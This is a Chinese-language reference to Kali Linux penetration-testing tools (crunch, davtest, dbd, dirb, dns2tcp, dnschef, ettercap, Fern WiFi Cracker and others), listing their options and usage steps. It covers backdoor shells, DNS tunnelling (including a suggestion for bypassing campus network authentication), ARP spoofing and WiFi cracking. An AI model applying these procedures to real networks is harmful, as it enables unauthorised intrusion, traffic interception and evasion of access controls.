这个工具已经失效了 kali上好多工具都失效了

crunch

字典生成工具

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17

crunch 6 8
//生成6到8位字典

crunch 6 8 1234567890 -o /root/num.list
//生成6到8位字典，参数为1234567890，-o 输出文件位置与名字

crunch 10 10 -t @@@@@@1219 -o/root/num.list
//-t 猜测部分，@表示未知参数

crunch 10 10 -f /usr/share/rainbowcrack/charset.txt mixalpha -o /root/num.list
// -f 指定字符集文件 使用mixalpha字符集

crunch 5 5 -t 2018%
生成以2018开头的5位纯数字密码

crunch 5 5 -p zhangsan lisi wangwu 123 456 789
生成zhangsan 、lisi、wangwu、123、456、789这个几个词组的组合，组合最大为5

cutcapt

网站截图工具

1

cutycapt --url=http://www.baidu.com/ --out=baidu.png               

D

davtest

WebDAV是基于Web服务的扩展服务。它允许用户像操作本地文件一样，操作服务器上的文件。借助该功能，用户很方便的在网络上存储自己的文件。为了方便用户使用，通常会提供给用户较大的文件权限，如上传、修改甚至是执行权限。Kali Linux提供了一款WebDAV服务漏洞利用工具DAVTest。该工具会自动检测权限，寻找可执行文件的权限。一旦发现，用户就可以上传内置的后门工具，对服务器进行控制。同时，该工具可以上传用户指定的文件，便于后期利用。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37

-auth+
	授权(用户:密码)

-cleanup
	完成后删除所有上传的内容

-directory+
	要创建的目录的后缀部分

-debug+
	DAV调试级别1-3（将2和3日志请求/响应复制到/tmp/perldav_debug.txt）

-move
	放置文本文件，然后移动到可执行文件

-nocreate
	不要创建目录

-quiet
	仅打印摘要

-rand+
	使用它代替文件名的随机字符串

-sendbd+
	发送后门:
		自动-用于任何成功的测试
		ext-后门/目录中与文件名匹配的扩展名

-uploadfile+
	上传此文件（需要-uploadloc）

-uploadloc+
	将文件上传到此位置/名称（需要-uploadfile）

-url+
	DAV位置的url

在服务器上利用WebDAV并获取Shell

https://www.myncic.com/archives/5570

DB Browser for SQLite

DB Browser for SQLite是一款开源的的sqlite数据库编辑器，在这里你既能创建一个新的数据库，也能打开已有的sqlite数据库进行编辑和查看，它最大的特点就是采用表格的创建和编辑方式，即便是您没有学习过SQL语句，也能使用该工具进行数据库创建和编辑的操作。

dbd

dbd功能类似于Netcat，但提供强大的加密功能，支持AES-CBC-128和HMAC-SHA1加密。该工具可以运行在类Unix和Windows系统中。渗透测试人员首先使用该工具在目标主机建立监听，构建后门。然后，再在攻击机使用该工具连接目标主机，执行Shell命令，从而达到控制目标主机的功能。为了安全，用户可以指定数据传输所使用的密钥，避免数据被窃听。除了作为后门工具，该工具还可以用于点对点的通信功能，如聊天等。
  这个程序是自由软件;您可以在自由软件基金会发布的GNU通用公共授权条款下重新发布和/或修改它;许可证的版本2，或者(根据您的选择)任何更新的版本。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42

-l
	监听传入的连接

-p n
	选择要侦听的端口，或选择要从其连接的源端口

-a address
	选择一个地址以收听或连接

-e prog
	连接后要执行的程序（例如-e cmd.exe或-e bash）

-r n
	无限重生/重新连接，在两次连接尝试之间暂停n秒。 -r0可用于在断开连接后重新监听（就像常规守护程序一样）

-c on|off
	开/关加密。 指定是否要使用内置的AES-CBC-128 + HMAC-SHA1加密实现（由Christophe Devine-http://www.cr0.net:8040/）或默认不使用：-c on

-k secret
	覆盖用于加密的默认短语（秘密必须在客户端和服务器之间共享）

-q
	安静，安静，不打印任何内容（覆盖-v）

-v
	详细的

-n
	切换仅数字的IP地址（不进行DNS解析）。 如果您两次指定-n，则原始状态将处于活动状态（即-n就像打开/关闭开关一样）

-m
	打开/关闭切换监视（监听）（仅与-e选项一起使用）。 还可以通过指定-vv（两次-v）来打开监听

-P profix
	为所有出站数据添加前缀（+硬编码分隔符）。此选项仅对“聊天模式”中的dbd有用（以昵称发送的前缀行）

-H on|off
	用硬编码（彩色）转义序列突出显示传入的数据（例如，聊天）。 默认为：-H off

-V
	打印版本标语并退出（在错误报告中包括该输出，并将错误报告发送至michel.blomgren@tigerteam.se）

类unix操作系统的特定选项:

1
2
3
4
5
6
7
8
9

-s
	调用shell，仅此而已。 如果dbd是setuid 0，它将调用一个根shell

-w n
	空闲的读/写操作和程序执行的“固定超时”（以秒为单位）（-e选项）

-D on|off
	分叉并在后台运行（守护进程）。 默认值：-D off

Dbd 也仅仅只支持 TCP/IP 连接

dirb

目录扫描软件

dirb是一个基于字典的web目录扫描工具，会用递归的方式来获取更多的目录，它还支持代理和http认证限制访问的网站

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18

格式：dirb <url_base> [<wordlist_file(s)>] [options]

-a 设置user-agent

-p <proxy[:port]>设置代理

-c 设置cookie

-z 添加毫秒延迟，避免洪水攻击

-o 输出结果

-X 在每个字典的后面添加一个后缀

-H 添加请求头

-i 不区分大小写搜索

1.使用/usr/share/wordlists/dirb/big.txt 字典来扫描Web服务

dirb http://192.168.1.116 /usr/share/wordlists/dirb/big.txt

2.设置UA和cookie

1

dirb http://192.168.1.116 -a "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0" -c "BAIDUID=D5C6351DAC89EF8811A51DF3A9A9C0C4:FG=1; HMACCOUNT=2906306413846532; BIDUPSID=D5C6351DAC89EF8811A51DF3A9A9C0C4; PSTM=1585744543; BDORZ=FFFB88E999055A3F8A630C64834BD6D0; H_PS_PSSID=30974_1438_31124_21098; HMVT=6bcd52f51e9b3dce32bec4a3997715ac|1587436663|; delPer=0; PSINO=6; BDRCVFR[gltLrB7qNCt]=mk3SLVN4HKm"

3.对每个字典添加.dist后缀并延迟100毫米

dirb http://192.168.1.116 -X .dist -z 100 -o test.txt

4.使用代理

dirb http://192.168.1.116 -p 46.17.45.194:5210

dirbuster

扫描Web目录，可以发现潜在的渗透目标。不同于网站爬虫，使用字典方式可以发现网站没有关联的网页。Kali Linux提供一款基于字典的Web目录扫描工具DIRB。该工具根据用户提供的字典，对目标网站目录进行暴力猜测。它会尝试以递归方式进行爆破，以发现更多的路径。同时，该工具支持代理、HTTP认证扫描限制访问的网站。该工具还提供两个命令，帮助用户从网页生成字典，或者生成定制字典。
DirBuster是一个多线程的基于Java的应用程序设计蛮力Web /应用服务器上的目录和文件名 。

或者如下如标注：

御剑怎么用 它就怎么用

dmitry

Dmitry是一个由C语言编写的UNIX/(GNU)Linux命令行工具，它可用于收集主机相关信息，比如子域名、Email地址、系统运行时间信息。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30

-o filename
	创建结果的ascii文本输出到指定的文件名。 如果未指定输出文件名，则输出将保存到“ target.txt”。 如果未以任何形式指定此选项，则默认情况下，输出将发送到标准输出（STDOUT）。 此选项必须尾随所有其他选项，即“ Dmitry -winseo target”。

-i
	在目标IP地址上执行Internet号码whois查找

-w
	在主机目标上执行whois查找

-n
	检索有关主机的netcraft.com数据，其中包括操作系统，Web服务器版本和正常运行时间信息（如果可用）。

-s
	在指定的目标上执行子域搜索。 这将使用服务器搜索引擎尝试以sub.target形式查找子域。 可以定位的子域级别没有设置限制，但是，最大字符串长度为40个字符（NCOL 40）以限制内存使用。然后，如果可能的子域返回正数，则可能会将其替换为IP地址 但是，如果主机在其DNS记录中使用星号，则所有解析的子域都将返回正值。

-e
	在指定的目标上执行电子邮件地址搜索。 通过尝试查找目标主机的可能电子邮件地址，此模块使用与子域搜索相同的概念来工作。 电子邮件地址也可以用于目标主机的可能子域。 电子邮件地址的长度限制为50个字符（NCOL 50），以限制内存使用。

-p
	在主机目标上执行TCP端口扫描。 该模块将列出特定范围内的打开，关闭和过滤端口。

-f
	此选项将导致TCP portscan模块报告/显示已过滤端口的输出。 这些通常是已由指定主机/目标上的防火墙过滤和/或关闭的端口。 此选项要求将'-p'选项作为上一个选项传递。 例如，“ dmitry -pf target”。

-b
	如果在扫描TCP端口时收到横幅，则此选项将导致TCP portcan模块输出横幅。 此选项要求将'-p'选项作为上一个选项传递。 例如，“ dmitry -pb目标”。

-t
	这将设置扫描单个端口时portscan模块的生存时间（TTL）。 默认设置为2秒。扫描具有防火墙和/或具有筛选端口的主机可能会降低扫描速度，通常这是必需的。

dns2tcpc

dns2tcp是一款利用dns协议传输tcp数据的工具。

适用条件

客户端的防火墙禁止tcp出站流量，无法上网，dns2tcp利用dns协议传输tcp数据，从而实现上网(dns协议是udp协议走53端口)

通过dns2tcp绕过校园网认证进行免费上网 前提是学校的这些端口打开了

https://zhuanlan.zhihu.com/p/354115958

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15

-c   大流量压缩

-F    前台运行

-f     指定配置文件

-r    指定使用的资源

-z    指定DNS域名

-k    设置传输密码

-l     侦听本地端口

-d   编译水平(1 | 2 |3 )   

准备阶段

1.在windows 2003 配置DNS服务器

修改服务器 /etc/dns2tcpd.conf配置文件

实例演示-建立隧道

1.服务器运行以下命令，侦听53端口，启动配置文件里所配置的资源，等待客户端来连接。

dns2tcpd -F -d 1 -f /etc/dns2tcpd.conf

2.客户端运行以下命令，侦听本地7002端口，使用ssh资源，如果有数据产生，将通过DNS服务器将数据发给服务器。

这样我们的7002端口，就跟目标53端口建立了隧道。

dns2tcpc -c -k pass -d 1 -l 7002 -r ssh -z lab.test.com

3.使用ssh连接本地7002端口，也就是连接服务器53端口，然后服务器在转发给22端口。

ssh root@127.0.0.1 -p 7002

4.这里我们也可以结合ssh动态端口转发命令，就可以配置浏览器进行代理上网。

ssh -CfNg -D 8080 root@127.0.0.1 -p 7002

dns2tcpd

有些网络的防火墙设置只允许端口53的UDP流量，就不能通过tcp搭建隧道，这种情况下我们可以通过UDP搭建DNS隧道，通过搭建一个DNS服务器委派的子域，这个子域因为使我们自己搭建的主机，这时候就可以通过这个子域搭建DNS隧道，和网络被限制的主机1交互。

主机3为DNS服务器需要设置为固定的IP地址

它的原理是通过DNS请求头域名的信息 TXT记录加密传输信息，我们可以通过抓取DNS隧道数据包，可以看到DNS的查询请求的域名信息test.lab.com前的一串数据，里面就是加密过后的交互数据。DNS隧道建立后，客户端（主机1）还是会不断地发包给服务器端（主机2），类似心跳一样，确认服务器端处于存活状态，保证传输的顺畅。

在主机3上搭建一个DNS服务器，并委派一个子域给主机2，配置转发器，除test.lab.com之外的域名用别的域名地址解析

搭建DNS隧道

在主机2

修改dns2tcpd的配置

vim /etc/dns2tcpd.conf

ssh:127.0.0.1:22

smtp:127.0.0.1:25

socks:127.0.0.1:1080

http:192.168.1.1:80

https:127.0.0.1:8087

在DNS服务器主机2上开启ssh,smtp,socks,http,https服务，开放22,25,1080,80,8087端口

配置一下ssh，使其能够在root权限下使用

主机2开启ssh服务。

service ssh start

主机2开启dns隧道

dns2tcpd -F -d 1 -f /etc/dns2tcpd.conf

主机1通过DNS隧道连接主机2使用ssh服务

dns2tcp -c -k pass123 -d 1 -l 2222 -r ssh -z test.lab.com

-c 启动流量压缩

-d debug查看信息

-l 设置本地侦听端口

-r 指定资源

在主机1上访问2222端口就相当于在主机2上访问的22端口

在主机1另开一个终端

ssh root@127.0.0.1 -p 2222

主机1就通过ssh登录上了主机2

主机1通过DNS隧道连接主机2使用http服务

在主机1上

输入dns2tcp -c -k pass123 -d 1 -l 2222 -r http -z test.lab.com

打开浏览器，输入http://127.0.0.1:2222/，就相当于是在主机2上访问192.168.1.1一样

主机1通过DNS隧道连接主机2使用https服务

dns2tcp -c -k pass123 -d 1 -l 7001 -r https -z test.lab.com

DNS隧道设置网关功能

DNS隧道是没有网关功能的，假如想将DNS隧道的客户端主机1作为一个网卡的话，先建立一个DNS隧道里再嵌套一个ssh隧道，用ssh隧道作为一个网关使用

主机3为DNS服务器需要设置为固定的IP地址

主机2开启ssh服务。

service ssh start

主机2开启dns隧道

dns2tcpd -F -d 1 -f /etc/dns2tcpd.conf

主机1通过DNS隧道连接主机2使用ssh服务，将2222端口作为DNS隧道的入口。

dns2tcpc -k pass123 -d 1 -l 2222 -r ssh -z test.lab.com

再再开一个终端，在主机1的DNS隧道里再搭建一个ssh隧道，并作为网关使用

ssh -CfNg root@127.0.0.1 -p 2222 -D 7002

主机1网关搭建好了，在主机4上打开浏览器设置代理，将主机1的ip和端口作为代理

然后主机4就能上网了，就相当于在主机2上网差不多。

通过内网的DNS服务器与外网DNS建立DNS隧道

主机1和主机3作为DNS服务器，作为DNS服务器IP地址需要设置为固定的IP地址，主机1的DNS配置上只做转发，将所有的DNS请求都转发给192.168.1.10，主机3委派子域给主机2的ip192.168.1.110，设置域名为test.lab.com

在主机2，停掉openvas防止占用一些特定的端口

开启DNS隧道

dns2tcp -F -d 1 -f /etc/dns2tcpd.conf

开启ssh

service ssh start

安装squid3

apt-get install squid3

开启squid

service squid start

在主机4，将DNS地址设置为内网中DNS服务器的ip地址，也就是主机1的ip：1.1.1.11

修改DNS sudo vi /etc/resolv.conf

nameserver 1.1.1.11

连接隧道

dns2tcpc -c -k-d 1 -l 8080 -r http -z test.lab.com

浏览器的代理设置为127.0.0.1:8080，便能上网了，和在主机2上上网一样。

dnschef

DNSChef是一个高度可配置的DNS代理，用于渗透测试和恶意软件分析。DNS代理（又名“假DNS”），可用于分析用户间传输的网络流量。例如，我们可以使用一个DNS代理伪造所有到“badguy.com”的请求至本地计算机，进而对流量进行分析。

就是说代理完之后 靶机电脑有关网络的操作 你都看得到

一、设置DNS代理

1.首先将计算机设置为使用DNS名称服务器工具。

Linux：

vim /etc/resolv.conf

nameserver 127.0.0.1(如果在本地运行)

Windows：

控制面板\所有控制面板项\网络和共享中心

属性–TCP/IPv4

二、运行DNSChef

查询一个域的”A”记录

三、拦截所有响应

使用–fakeip参数修改域名指向IP

dnschef –fakeip=127.0.0.1

四、过滤域

dnschef –fakedomains baidu.com –fakeip 127.0.0.1：所有请求baidu.com转到127.0.0.1，

五、反向过滤

dnschef –fakeip=127.0.0.1 truedomains baidu.com：只有baidu.com匹配为真实地址，其他的都为127.0.0.1

六、外部定义文件

domain = ip对的集合，使用空格隔开。

dnschef –file 文件名

七、其他的配置

1.–interface | -i参数指定在其他的端口监听DNSChef。

2.–nameservers参数指定名称服务器，默认为8.8.8.8。多个使用”,”隔开

3.-p参数指定开启的端口监听DNS请求

4.-q参数不显示头部

5.-t | –tcp使用tcp DNS 代理

dnsenum

dnsenum是一款非常强大的 域名信息收集工具，它是由参与backtrack 开发项目的程序员所设计，设计者名叫Fillp (barbsie) Waeythens ，该名开发者是一个精通web渗透测试的安全人员，并对DNS信息收集有着非常丰富的经验。

定义

dnsenum的目的是尽可能收集一个域的信息，它能够通过谷歌或者字典文件猜测可能存在的域名，以及对一个网段进行反向查询。它可以查询网站的主机地址信息、域名服务器、mx record（函件交换记录），在域名服务器上执行axfr请求，通过谷歌脚本得到扩展域名信息（google hacking），提取自域名并查询，计算C类地址并执行whois查询，执行反向查询，把地址段写入文件。

DNSenum是一款dns查询工具。它能够通过Google或字典文件猜测可能存在的域名，并对一个网段进行反向查询。
它不仅可以查询网站的主机地址信息，域名服务器和邮件交换记录，还可以在域名服务器上执行axfr（区域传送）请求，然后通过Google脚步得到扩展域名信息，提取子域名并查询，最后计算IP地址并执行whois查询，执行反向查询，把地址写入文件。

常用选项：

1
2
3
4
5

–enum 相当于–threads 5 -s 15 -w.
-v 详细显示所有进度和所有错误消息，加上-v会很慢，会动态的进行记录扫描，产生消息过多
-w 执行whois查询
-o [file] 以XML格式输出到指定文件中，方便之后查询
-t/ --timeout 超时设置，可以提高速度但可能会影响查询结果

示例

1.对sina.com(新浪) 实现dns查询
命令： dnsenum –enum sina.com

基本的域名IP信息。
IN:INTERNET,表示资源都在Internet上

A记录代表”主机名称”与”IP”地址的对应关系， 作用是把名称转换成IP地址，意思是说该主机的IP对应之意！DNS使用A记录来回答”某主机名称所对应的IP地址是什么？”主机名必须使用A记录转译成IP地址，网络层才知道如何选择路由，并将数据包送到目的地.你要知道的是A就代表了将域名转换成ip，现在好多的工具都有这个功能。

对sina.com进行区域传送，结果基本为refused，现在绝大部分dns服务器对区域传送进行了严格的限制，不过尝试一切能够尝试的，才能得到甘甜的果实。

1
2
3

区域传送:在本域的各个域名服务器之间进行信息的同步
像这样:
dig @ns1.example.com example.com axfr  

如下图

这里是dnsenum进行Google脚步搜索，这里未连接到Google自然就无法使用这个功能。
\2. 使用字典文件进行dns查询

1

dnsenum --noreverse -f /usr/share/dnsenum/dns.txt sina.com

在kali Linux中/usr/share/dnsenum/中
前面和上面例子一样

子域名暴力查询部分
CNAME（别名）： 用于将DNS域名的别名映射到另一个主要的或规范的名称 。意思就是通过CNAME将你访问的没有IP地址的域名间接的变成访问另外一个主机。比如你要访问上图的ads.sina.com实际访问的时候，就变成了访问ww1.sinaimg.cn.w.alikunlun.com，它只是起到一个映射的功能。

C类IP地址

IP块
由于dnsenum会使用反向查询IP地址，所以使用–noreserve跳过这个过程以加快查询速度。

dnsrecon

由Carlos Perez 用Python开发，用于DNS侦察。

此工具可以完成下面的操作:

1
2
3
4
5
6
7

区域传输 ---- Zone Transfer
反向查询 ---- Reverse Lookup
暴力猜解 ---- Domain and Host Brute-Force
标准记录枚举 ---- Standard Record Enumeration (wildcard,SOA,MX,A,TXT etc.)
缓存窥探 ---- Cache Snooping
区域遍历 ---- Zone Walking
Google查询 ---- Google Lookup

用法:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57

-h, --help                                       打印帮助信息并退出

 -d, --domain      <domain>          目标域名

 -r, --range       <range>                对给定格式的IP范围进行爆破，格式为(开始IP-结束IP)或(范围/掩码).

 -n, --name_server <name>          指定一个域名服务器

 -D, --dictionary  <file>                 用来爆破的子域名与主机名字典文件

 -f                                                   在保存结果时忽略枚举域查找结果

 -t, --type        <types>    指定枚举类型：

                              std                如果NS服务器的域传送失败，进行SOA、NS、A、AAAA、MX 和 SRV的枚举(必须使用-d参数指定域名才可使用此参数)

                              rvl                 对给定的IP范围或CIDR进行反向查找(必须使用-r指定IP范围)

                              brt                使用指定的字典爆破域名与主机名

                              srv                枚举SRV记录

                              axfr               对所有的NS服务器进行域传送测试

                              goo               对子域名和host进行Google搜索

                              snoop           对-D选项给出的文件进行DNS服务器缓存侦测

                              tld                 删除给定域的TLD并测试在IANA中注册的所有的TLD

                              zonewalk      使用NSEC记录进行DNSSEC域漫游

 -a                          在标准枚举过程中进行空间域传送测试

 -s                          在标准枚举过程中进行IP地址范围的反向查找

 -g                         在标准枚举的过程中进行Google枚举

 -w                         在标准枚举的过程中进行深度whois查询和IP反查

 -z                          在标准枚举的过程中进行DNSSEC域漫游

 --threads         <number>       指定线程数

 --lifetime        <number>       指定查询等待的时间

 --db              <file>                 将结果存储为sqlite3数据库的文件

 --xml             <file>                 将结果存储为XML格式的文件

 --iw                                          即使发现了通配符也依然爆破

 -c, --csv         <file>                 CSV格式的文件

 -j, --json        <file>                 json文件

 -v                                             显示爆破的过程

实例:

对给定的IP范围进行域名反查

E

Exploit Database

实时外网渗透实例

Engrampa 归档管理器

就是看压缩包的软件

enum4linux

描述:

选项:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23

-U
	获取用户列表

-M
	get machine list*

-S
	获取共享列表

-P
	获取密码策略信息

-G
	获取组和成员列表

-d
	详细说明，适用于-U和-S

-u user
	指定要使用的用户名（默认为“”）

-p pass
	指定要使用的密码（默认为“”）

附加选项:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17

-a
	执行所有简单的枚举（-U -S -G -P -r -o -n -i）。如果您未提供其他任何选项，则启用此选项。

-h
	显示帮助信息并退出

-r
	通过RID循环枚举用户

-R range
	要枚举的范围（默认值：500-550、1000-1050，暗含-r）

-K n
	继续搜索RID，直到n个连续的RID与用户名不对应为止。 Impies RID范围以999999结尾。对于DC很有用。

-l
	通过LDAP 389 / TCP获取一些（有限的）信息（仅适用于DC

观察不同参数的数据包，发现enum4linux在扫描的时候会先发送下面红框内的数据，追踪流发现数据格式几乎完全一致

Ettercap

ettercap是一款强大的嗅探工具。

ettercap主页面

ettercap mitm方法

1
2
3
4
5

ARP                                    ARP欺骗
ICMP                                  发送ICMP数据包重定向到kali，然后由kali转发(只有受害者发出的数据包经过kali)
DHCP                                发送DHCP数据包，让受害者认为kali是路由器，(只有受害者发出的数据包经过kali)
Swith Port Stealing            ARP静态绑定欺骗
NDP                                   ipv6协议欺骗技术

实例演示-arp欺骗

1.打开ettercap，选择你要使用的网卡，点击”对号”。

2.点击”搜索”按钮，进行主机发现。

3.点击”红色方框里面的按钮”，我们可以查看”host list”.

4.将想要欺骗的网关和受害者分别添加到”add to target 1”和”add to target 2”。(需要至少两个192ip网关)

5.点击”圆圈”，选择”arp poisoning spoofing”。

6.选择”sniff remote connections”，然后点击”OK”。这样就配置完成，ettercap会自动开始arp欺骗。

7.我们在受害者主机上可以看到网关的mac地址，已经替换成192.168.3.23的mac地址。

ettercap-graphical

跟gttercap一样 特地写了个图形模式 可实际上两个都是图形牧师

exe2hex

提过多种编码方式转换文件

转换成二进制文件

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38

-h,--help
	显示帮助信息并退出

-x EXE
	EXE二进制文件转换

-s
	从STDIN读取

-b BAT
	BAT输出文件（DEBUG.exe方法-x86）

-p POSH
	PoSh输出文件（PowerShell方法-x86 / x64）

-e
	URL编码输出

-r TEXT
	pRefix-在每行命令之前添加的文本

-f TEXT
	suFfix-在每行命令后添加的文本

-l INT
	每行最大十六进制值

-c
	在转换之前克隆并压缩文件（使用-cc进行更高压缩）

-t
	创建一个Expect文件，以自动进行Telnet会话。

-w
	创建一个Expect文件，以自动执行WinEXE会话。

-v
	启用详细模式

F

Fakelogon

https://mp.weixin.qq.com/s?__biz=MzAwMjc0NTEzMw==&mid=2653578752&idx=1&sn=862eef80bdac97774e365534e33a8693&chksm=811b7042b66cf954544947130dd671fe0a062b39310af794d5f7cdaf0bde05ca0df9e73ccfaf&mpshare=1&scene=23&srcid=0416TxUfJ8xijnjXmm6ob86J&sharer_sharetime=1650113928776&sharer_shareid=ee83a55e0b955b99e8343acbb61916b7#rd

Firefox ESR

火狐浏览器

faraday IDE start

一款多功能协同式渗透测试工具&漏洞管理平台

新版本的Faraday引入了一个新的概念，即IPE(整合型渗透测试环境)，也就是所谓的多用户渗透测试IDE。在Faraday的帮助下，广大研究人员可以在安全审计的过程中跟其他用户分享分析数据，或查询其他用户提供的分析结果。

值得一提的是，除了数据方面的共享之外，Faraday还可以将社区中可用的工具以多用户协同使用的方式提供给大家。

毫无疑问，Faraday提供了一种发送、上传和共享漏洞的新方式，因为新版Faraday整合了Service Now，因此我们的选择将会更加丰富

faraday IDE stopFaraday可以将用户加载的数据以不同的可视化效果显示出来，这对于管理人员和渗透测试人员来说都非常实用

整合了Jira

Faraday允许我们在不需要填写任何表单的情况下向Jira发送多个漏洞，因此，我们不必在每次提交漏洞时输入我们的Jira凭证，我们可以直接在工具配置项中进行修改或更换项目。

Burp插件翻新1、 Burp插件可直接使用多种Faraday服务器API，因此我们将不再需要GTK客户端；

2、 插件采用Java语言重写；

3、 添加了双因素身份验证(2FA)支持来增强安全性；

fern wifi cracker

Fern Wifi Cracker是一种无线安全审计和攻击软件编写的程序，使用Python编程语言和Python的Qt图形界面库，该程序是能够破解和恢复WEP、WPA、WPS键和无线或以太网上运行其他基于网络的攻击基于网络的。

使用这个工具前需要一张网卡， 下面是网卡部署：

使用这款工具前最好自定义一个MAC地址，以便隐藏我们的真实MAC地址信息。

由于Fern WiFi Cracker是图形界面的，不需要敲命令，所以操作起来比Aircrack-ng简单了许多。

首先选择Interface，如下图中的wlan0，然后点击蓝色Wifi图标使状态变为Active

软件会自动识别附近的WEP和WPA网络，这里我们只搜到了WPA类型的网络，点击WPA图标。

进入以下界面，选择我们需要破解的Wifi SSID名称，然后点击Browse浏览字典文件。

如果该热点支持WPS就选择WPS Attack模式，最后点击右侧的Wifi Attack按钮开始破解

和Aircrack-ng一样耐心等待，运气好的话就会看到破解成功的界面:

Fern WiFi Cracker除了破解WEP、WPA/WPA2加密网络外，还具备MAC地址地理位置追踪、Cookie劫持以及对HTTP、Telnet、FTP服务的爆破功能。

但不幸的是MAC地址地理位置追踪功能由于调用的服务在2011年已经关闭，所以无法使用此项功能了。

Cookie劫持功能未测试成功，只抓到本机的Cookie信息

ffind

描述

参数

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31

-a
	查找所有出现的inode。

-d
	仅查找已删除的条目。

-f fstype
	标识映像的文件系统类型。 使用“ -f列表”列出支持的文件系统类型。 如果未给出，则使用自动检测方法。

-u
	仅查找已删除的条目。

-i imgtype
	标识图像文件的类型，例如原始文件。 使用“ -i列表”列出支持的类型。 如果未给出，则使用自动检测方法。

-o imgoffset
	文件系统在映像中开始的扇区偏移量。

-b dev_sector-size
	基础设备扇区的大小（以字节为单位）。 如果未给出，则使用图像格式的值（如果存在）或假定为512字节。

-v
	详细输出到stderr。

-V
	显示版本信息

image [images]
	要读取的磁盘或分区映像，其格式以“ -i”给出。 如果将图像分为多个段，则可以指定多个图像文件名。 如果仅给出一个图像文件，并且其名称是序列中的第一个文件（例如，以'.001'结尾的指示），则后续的图像段将自动包含在内。
	inode要查找的inode的整数。
	该程序搜索所有目录条目以查找给定的inode。 当已使用ifind（1）从磁盘单元地址中识别出一个索引节点时，这很有用。

fierce

Fierce是使用多种技术来扫描目标主机IP地址和主机名的一个DNS服务器枚举工具。它可以快速获取指定域名的DNS服务器，并检查是否存在区域传输（Zone Transfer）漏洞。如果不存在该漏洞，会自动执行暴力破解，以获取子域名信息。而且，对获取的IP地址，还会遍历周边IP地址，以获取更多的信息。最后，还会将IP地址进行分段统计，以便于后期其它工具扫描，如Nmap。

实例:

fls

描述：

参数:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38

-a
	显示“.” 和“ ..”目录条目（默认情况下不会）

-d
	仅显示已删除的条目

-D
	仅显示目录条目

-f fstype
	文件系统的类型。 使用“ -f列表”列出支持的文件系统类型。 如果未给出，则使用自动检测方法。

-F
	仅显示文件（所有非目录）条目。

-l
	以长格式显示文件详细信息。 显示以下内容：file_type inode file_name mod_time acc_time chg_time cre_time size uid gid

-m mnt
	以时间机器格式显示文件，以便可以使用mactime（1）创建时间线。 作为mnt给出的字符串将在文件名之前作为安装点（例如/ usr）。

-p
	显示每个条目的完整路径。 默认情况下，它以“ +”号表示递归运行的目录深度。

-r
	递归显示目录。 这不会跟随已删除的目录，因为它不会。

-s seconds
	原始系统的时间偏差（以秒为单位）。 例如，如果原始系统的速度慢了100秒，则该值为-100。 仅在给出-l或-m的情况下使用。

-i imgtype
	标识图像文件的类型，例如原始文件。 使用“ -i列表”列出支持的类型。 如果未给出，则使用自动检测方法。

-o imgoffset
	文件系统在映像中开始的扇区偏移量。

-b dev_sector_size
	基础设备扇区的大小（以字

foremost

ctf工具 用于分割 和binwalk差不多

相对来说binwalk更加强大，速度也快，但是有时候如果不能分离出来，就可以试试看foremost。

foremost是一个控制台程序，用于根据页眉，页脚和内部数据结构恢复文件。Foremost可以处理图像文件，例如由dd，Safeback，Encase等生成的图像文件，或直接在驱动器上。页眉和页脚可以由配置文件指定，也可以使用命令行开关指定内置文件类型。这些内置类型查看给定文件格式的数据结构，从而实现更可靠，更快速的恢复。在数字取证中和CTF中常用来恢复、分离文件。它默认支持19种类型文件(jpg, gif, png, bmp, avi, exe, mpg, mp4, wav, riff, wmv, mov, pdf, ole, doc, zip, rar, html, cpp 等文件)的扫描识别恢复，还可以通过(通过配置它的配置文件foremost.conf)增加新的支持类型。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15

c:\> foremost [-v|-V|-h|-T|-Q|-q|-a|-w-d] [-t <type>] [-s <blocks>] [-k <size>]
    [-b <size>] [-c <file>] [-o <dir>] [-i <file]

-V  - 显示版权信息并退出
-t  - 指定文件类型.  (-t jpeg,pdf ...)
-d  - 打开间接块检测 (针对UNIX文件系统)
-i  - 指定输入文件 (默认为标准输入)
-a  - 写入所有的文件头部, 不执行错误检测(损坏文件)
-w  - 向磁盘写入审计文件，不写入任何检测到的文件
-o  - 设置输出目录 (默认为./output)
-c  - 设置配置文件 (默认为foremost.conf)
-q  - 启用快速模式. 在512字节边界执行搜索.
-Q  - 启用安静模式. 禁用输出消息.
-v  - 详细模式. 向屏幕上记录所有消息。

实例：

可以参考https://blog.csdn.net/john_david_/article/details/87273152

fping

Fping程序类似于ping（ping是通过ICMP（网络控制信息协议InternetControl Message Protocol）协议回复请求以检测主机是否存在）。Fping与ping不同的地方在于，fping可以在命令行中指定要ping的主机数量范围，也可以指定含有要ping的主机列表文件。

与ping要等待某一主机连接超时或发回反馈信息不同，fping给一个主机发送完数据包后，马上给下一个主机发送数据包，实现多主机同时ping。如果某一主机ping通，则此主机将被打上标记，并从等待列表中移除，如果没ping通，说明主机无法到达，主机仍然留在等待列表中，等待后续操作。

Fping类似于ping，但比ping强大。Fping与ping不同的地方在于，fping可以在命令行中指定要ping的主机数量范围，也可以指定含有要ping的主机列表文件。
